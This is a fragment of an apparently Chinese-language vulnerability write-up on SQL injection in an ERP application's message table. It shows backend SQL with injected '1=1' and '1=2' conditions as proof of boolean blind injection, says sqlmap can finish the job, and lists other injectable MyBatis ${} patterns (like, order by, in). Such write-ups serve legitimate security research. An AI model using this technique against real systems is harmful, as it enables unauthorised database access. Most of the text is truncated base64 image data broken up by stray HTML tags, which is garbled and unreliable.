oYSE9Px4QJE9CpUyccO3YMZmZmGDlyJMaPH2+yGIQQsLS0VNQxMGTIEPzxxx8mi4WIiIiIjI8dA0REREREVOglJqdi8c/n8zsMAECXLl3w448/StPx8fHYs2cPPD09MWrUKJQrVw7vvfce/Pz84OzsbJIYzMzM8M8//yAsLEx22UaNGpkkBiIiIiIyHaN0DPgd/Q5HfM2kaSEqo/24UWhrbozS3zS+2Oxgj0XXs9RXC1ecPzoTVvkYVd4Kwp5p7+LvHjvw3bi66il7puG9wMk49mWnfIqNiIiIiCh/de3aFa6urggODkadOnWk+Z9//jlWr14NAGjdujW++OILzJs3DyVLljRJHDY2NrCxsTFJ2fnNZ3Y1TNiTtQ3bAm7nj2Jm4WmU6SGj/fa/rG1+q/fx49ZxqKsj15ulsLdho3DF0wuXo7IcA+ZtMW5sG5j8so/fMWw+DPSb2RsNTL0uIqJCxmhPDJi3G42xr3oCoq7sw549x1DZwC/uqCv7sOdRA7UfG03zXkfjdj3Dhj6AqqPAfnZDhGXMICIiIiKiPFa0iBnGdGuCyuV1j5X/LDoep28G41l0gsli6dChA0qUKIEzZ85g3Lhx0vwuXbqo/T8pKQm+vr5v7MV7U2vheg5HX/UE+G52gL39bDQM2wBDWmW+mx1gv3+o2o1fmua9jnovPob5nQDVRfL33Ou/4RfDKTurvtPg0ABQdRTsOVoZMx0s8zssIiLKJZMMJWTeti2sLx3BI7/eaMAuXRlWmDnXEW6rH8IXfV7rE0UiIiIiotdVlQqlMW9UO5QuId9Eikt8iRnfHsOl+09NEkuZMmXQunVrnD17Vq1joGjRzBcjFylSBACQlpZmkhiEEKhRo4aioYRGjhyJffv2mSSOvGI1cy4c3cbjoM8G9OH
<p><a id=img13 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233228-1bc86566-c117-1.png><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABdwAAAHRCAYAAABw5HupAAEAAElEQVR4nOzdd1gURx8H8C/2rmjsjWYDBbtijwW7sRdsiUmsKZpEjZFmx66J0RjjG4kaQVNMoliwRY3dxF6pAoogVbrAvH/gLRzc3e5xR1G/n+fh0d3Zmf3t7N7tztzurIkQQoCIiIiIiIioECQnJeGfU6fQuUcPlClbtrDDISIiIjJIscIOgIiIiIiIiIiIiIjodcAOdyIiIiIiIiIiIiIiI2CHOxERERERERERERGREbDDnYiIiIiIiIiIiIjICNjhTkRERERERERERERkBOxwJyIiIiIiIiIiIiIyAna4ExEREREREREREREZATvciYiIiIiIiIiIiIiMgB3uRERERERERERERERGwA53IiIiIiIiIiIiIiIjYIc7EREREREREREREZERsMOdiIiIiIiIiIiIiMgI2OFORERERERERERERGQE7HAnIiIiIiIiIiIiIjICdrgTERERERERERERERkBO9yJiIiIiIiIiIiIiIyAHe5EREREREREREREREbADnciIiIiIiIiIiIiIiNghzsRERERERERERERkRGww52IiIiIiIiIiIiIyAjY4U5EREREREREREREZATscCciIiIiIiIiIiIiMgKtHe4P13eCiYmJxr9O6x8WZIz57+F6dHodt4uIiIiIiOgN8Ua1YYmIiKjIytMd7uc/awyTaYeMHUshOYRpjT/D+cIOg4iIiIiIiPLF69WGJSIioqJMQYf7VHgLASEEhPDGVNXs7/eDlytERERERERUtLANS0RERIVHzzvc+2PoVC1JL4dlkR7b67QeuR7aOzQtx2N9h7C+U87lD2Gahsf+sh4PnKZ+kaRgvYem5XyksBPWP1SVOQDfv1zu/GeN+bghERERERHRa8OwNqy2tiTwMEdbNqsda2JiouVu+hzLaGrfZi932qEcbeicy+qKT/k2EhERkXHp1+H+cD2WqHqnpw5Ff2l2J5jkHJbl/GdonO2C4OH6TjAZ8D3UFxmAzwwYy0XJeg9NM0GO1RIREREREdGbwIA2rPK25D5MznYjFwDg+wHqne6Hpqnd7JVtQQwwMYHG/vnvB+RoQ3+PAdk6zOXiU7KNREREZHwKOtwzLwBMTEyyTtb26/Bgq+pS5RDWvOw1n+qtemzvAdbZZ+Zdsv6h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
<p>后台SQL语句</p>
<div class=highlight><pre><span></span><span class=k>SELECT</span> <span class=k>COUNT</span><span class=p>(</span><span class=n>id</span><span class=p>)</span> <span class=k>FROM</span> <span class=n>jsh_msg</span> <span class=k>WHERE</span> <span class=n>jsh_msg</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=mi>1</span> <span class=o>=</span> <span class=mi>1</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=n>delete_Flag</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=o>!=</span> <span class=s1>'1'</span> <span class=k>AND</span> <span class=n>status</span> <span class=o>=</span> <span class=s1>'1'</span> <span class=k>AND</span> <span class=mi>1</span> <span class=o>=</span> <span class=mi>1</span>
<span class=k>SELECT</span> <span class=k>COUNT</span><span class=p>(</span><span class=n>id</span><span class=p>)</span> <span class=k>FROM</span> <span class=n>jsh_msg</span> <span class=k>WHERE</span> <span class=n>jsh_msg</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=mi>1</span> <span class=o>=</span> <span class=mi>1</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=n>delete_Flag</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=o>!=</span> <span class=s1>'1'</span> <span class=k>AND</span> <span class=n>status</span> <span class=o>=</span> <span class=s1>'1'</span> <span class=k>AND</span> <span class=mi>1</span> <span class=o>=</span> <span class=mi>2</span>
</pre></div>
<p>根据后面的条件是否成立返回的结果不一致故存在布尔盲注后面只需要使用sqlmap跑一遍即可</p>
<h3 id=toc-10>其他注入点</h3>
<p>还存在很多注入点,上面只描述了时间盲注和布尔盲注两种类型,同时体现了<code>like ${}</code><code>${}</code>,正常<code>${}</code>比较少,一般会使用<code>#{}</code>重点like、order by、in等关键字</p>
<p><a id=img14 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233243-2490012c-c117-1.png><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB3kAAANeCAYAAAAfgLTZAAEAAElEQVR4nOzdd1gURx8H8O8hiqhIURFUFKRYULChghqNBRU1auzYEmPsRk3sBbBFxZrYkhgTjT1qXk3s2DX23qUjqAgK0vvt+wfccQdX4Sia7+d57oHd2Z357e3e3c7OzqxIEAQBRERERERERMUgNSUF/54/jzYdOqC8oWFJh0NERERERKQTmZmZAADH8X+UWAy7xznDuHLlEitfIi4+vsTjsLaxAQDo6+trva6iemtSQoJO4yusikZG0H7LiIiIiIiIiIiIiIiIiEiqJBt3Kb/QkBAAgJ29fQlHUnT0SjoAIiIiIiIiIiIiIiIiIiLSHHvyEhERERERERERERERERUxq2pGAICGVlXypWUJAk7fDUPnpnVQRiTKl/4k/B0AIDxaN8MGp6WlAwAiIyM1XsfCwgIGBuV0Ur5sHNrEUFRxfIjYk5eIiIiIiIiIiIiIiIiI6APCnrxERERERERERERERERERaxNw5oAgIXD3PKlpWVkwWnCdqz5ugMMypbJl+698woAYO+FZzqJJT4+HgBw8fJljdfp5u6OatWq6qR82Ti0iaGo4vgQsScvEREREREREREREREREdEHhD15iYiIiIiIiIiIiIiIiP5DRDnP/S1TJn+vYXXrUOnARl4iIiIiIiIiIiIiIiKi/5CqVasAADwHDyrhSKigOFwzEREREREREREREREREdEHhD15iYiIiIiIiIiIiIiIiP5D3r59BwA4dfq0xuu4d+4s7QFMJY+NvERERERERERERERERET/IYIgAACysrK0XodKBw7XTERERERERERERERERET0AWFPXiIiIiIiIiIiIiIiIqIi9u+TlwCAbzafzZeWldNL9tst51FGJMqX/iT8nU5jqVy5MgDgk7ZttV5H13FoE0NRxaErmZmZuP/gAV6/fg2xWKxwGQsLCzRr2hT6+oVrpmUjLxERERERERERERERERFRIYjFYvyxYwciXr5E5cqVoaegsR4A7j94gNCwMAzs379Q5bGRl4iIiIiIiIiIiIiIiKiIhUcnyP1V5PTdsGKJxcCgHACgTp3axVKeqjhKOgZdefbsGSJevkRXd3e0atlS6XKnz5zBlatXERUVBXNz8wKXx2fyEhEREREREREREREREREVQkhoKPT09NC0aVOVyzVu1AgAEPbiRaHKY09eIiIiIiIiIiIiIiIiokJ4vHkEAMBx/B8lHAkBgLWNTbGXmZySAiMjI5QrW1blclWrVoVIJEJMTEyhylPakzdgrRtEIpHCl9vagEIVWuoErIXbx7hdREREREREH7H/VL2ViIiIiIg+CJLGXio5xd3Am5qaivdxcchIT4cIQFhYmMpXREQEyurrIz4+Hu/j4pCamlqgcgvUk/fqtw4QPTsG4efuBSq0dDmOsQ7f4ioA15IOhYiIiIiIiHTi46q3EhERERFRaaevn9vk9nzLqBKMhIrbT7/8gvj4eOn09h07NFrv6bNnePrsGSpXroyp33yjdbkaNPKOwTHhZ2RXi49jrMgDvwDAL4dw/OfuYHWZiIiIiIiIShbrrURERERERFQyBvTvj7dv3xZ4/apVqxZoPaXDNSvWHX3GKEnKGfJYOjyW21rkGxzr+Ng8w2cdx1q3vMsfx1gFw2vlDsM1Fse1LPf42LxDd7lhbYAkz5zKP3Lu9OawXkRERERERB+wwtVbldUfgYA89dfcuqtIJIJo7HEFBeZZRlGdVjbfscfz1JvzLqsqPs23kYiIiIiIiHSnZo0acHZykr4cGzaUm877yptes0aNApWr3XDNAWuxWNIiOqaP9G7ogLVucPj2qvyyV7+Fg+iZ9G5qRctc/dYDedbSMhz15R4fK4LHLwpXJyIiIiIioo9NIeqtmtcf92Ok6Kp8ffYXD4ggMzz08bEQKczsF3iIfsGYYwLyjST9iwdEv+RZ1q0+/K9Mg70G8WmyjURERERERFQ0IiMjceToUbx6/RoVKlRAh/bt0aJ5c2n6o8eP4Xf6NBISElC9enX08PBArZo1C1yeBj15f4GH5A7gnGfXwnUN/KW10eNYlVOJHHNMgCAIEAR/rHHNXnfx2gC5ZbKH0cpZ7piy26s1oVm5h3IqwK5r/HOWESAIVzDNHrCfdgWCcAySKCTLXJlmX4i4iIiIiIiIqHjppt6qqv4o5+pVQLqMJB8AvyzO6VV7HGOlrbEydWCZ+ucvHvl76QKuWOOfJ8+rzxCYsw2q49NkG4mIiIiIiKgopKamYvfevcjIzESnjh1hYWGBY8eP47m/PwAgPDwc/zt0CGZmZuj46acAgL379iE5ObnAZWo5XDOyK8o5dxEDAI4fkg53/IuHZEgoB0jadK8+C5RbZswxmbuHu0/PrbhqS5NyZUiGYuZQVURERERERB+5gtRbZaitP7quwXZpy689pi2QNN1exbNA+fJc10yX6UHbHdNzW4RxKG8r75gFOQ229ug5QLLcQzzLE4TC+LTcRiIiIiIiItKdkNBQJCYmYvCgQWjj5obBAwfC0NAQR48dw/YdO/DX//4HAwMDDB0yBG3btMGggQORnJyM0NDQApepQSNvzl3H/mvgCmQP9STzrKGAZw8LXHhhaFZud/yct7fw1W/hkPeZRURERERERPQB00W9tWjqj43ry3cDtq/fWKP18i+nOr6SqpsTERERERERIBKJ8s0TBEH6f5ZYLJeWkZ6evZ6e9v1xJTRf034atkvuOP7FA5L6cm7FUzKsVJ5XvocM6YbG5Xb/GYIgwF+uy/BVfLsq/8BYRERERERE9AErbL21gPVHbRpYc5d1RX07jVdTG19J1c2JiIiIiIgIsK5TB5UqVcLefftw+d9/sWvPHqSmpqKHhwdGDh+OHh4eSE1Nxa49e3D533+x988/UalSJdhYWxe4TK2ah+2nLcj//CC7+tl3Suer+AZg7dicoaOky8g/dyhg7Ujp0FGKXN1/JGfoKdln+ubQpFy52K/IP9dIUXkcvoqIipAQHy/3IiIiIiLdK3C9VS4PNfXHq98iNxvZ+uoY9OkOoHsfJc/elVnWdQB65n3Wr4YUxqflNhIREREREZHulC9fHkMGD0ZZfX2cPXcO0dHR8OjeHfUcHAAA9Rwc4NG9O6Kjo3H23DkYli8Pz8GDUb58+QKXqWUfYNnhoX7B4rUBgP00LMitveY89yfn2T+SG5Rll8Ev8MhZxkFhC2939JE+zuhbOIhEEIk88NA1T+1ak3JxHGOl82WfR+SKNdMldzHbob6rfD5uHMuZiHRAfOcOxLdvQ/D3h/D6NQBAVLmy9EVERERERaGA9VaN6o+5cp9766Hg+bvyMXiI8i87ZoHMM4M1oiY+jbaRiIiIiIiIioqlhQVGf/UV5s6ejenffosWzZvLpbdo3hzTv/0Wc2fPxuivvoKFhUWhytN+oOfu06V3C1/91gFjjwPdf847XFQ22Upr/mVcscZf8Z3R3X+Wn++6xh/bByhaTn25+Y3BMeEKpkkXsMe07WugooMvEZFa4jt3IL54Mft15w4Ef3/oNWsGvebNIXJwgMjSkg27RERERMWlgPXW/PLWH3O4roF/nufjjjkm4Irsgt1/hiAcQ56n6GavKwjQzejJ8vEVbBuJiIiIiIhIl/T19QuVrimRIPvU32IXgLVuOXcfu66B/xVWPImo9BP8/SEEBEBISICoUiVAJIKoWTOILC1LOjQiIiKiUi81JQX/nj+PNh06oLyhYUmHowXWX4mIiIiIiP4LFNVbkxISSjgqeRWNjKCbpmIioo+UtEHX3x+oVAkAsht027WDHnvmEhERERERERERERFRCWAjLxFRDuH1a/lGXSMjiOztIbK3R5kePUo6PCIiIiIiIiIiIiIiIgBs5CWi/yghPh7C3bvZDbp37mTPtLTMfo5ujx4QjR5dsgESERERERERERE
<p><a id=img15 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233255-2b8e1b30-c117-1.png><img src="data:image/png;base64,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
<p><a id=img16 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233308-33745a4e-c117-1.png><img src="data:image/png;base64,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